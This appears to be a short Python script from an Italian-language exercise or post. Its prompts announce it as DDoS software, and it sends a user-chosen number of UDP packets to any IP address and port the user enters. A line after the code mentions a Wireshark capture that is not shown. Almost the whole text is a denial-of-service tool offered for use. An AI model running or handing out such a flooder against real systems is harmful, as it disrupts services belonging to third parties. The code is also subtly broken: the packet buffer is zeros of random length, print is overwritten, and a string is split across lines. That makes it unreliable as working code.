

```
import socket
import random

def udp_flood (ipadress, port, npacchetti):
    udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    pacchetto = bytearray(random.getrandbits(8))
    for _ in range(npacchetti):
        udp_socket.sendto(pacchetto, (ipadress, port))
    udp_socket.close()

print ("Ciao sono un software per attacchi DDos. Oggi andremo ad effettuare il tuo primo
attacco\n")
print ("Inserire l'IP address:")
ipadress = str(input())
print ("\nInserire la porta che si vuole utilizzare:")
port = int(input())
print ("\nInserisci il numero di pacchetti che vuoi mandare: ")
npacchetti = int(input())
print = ("Ok, let's start\n")
udp_flood(ipadress, port, npacchetti)
```

Di seguito lo screen della cattura dei pacchetti inviati con wireshark

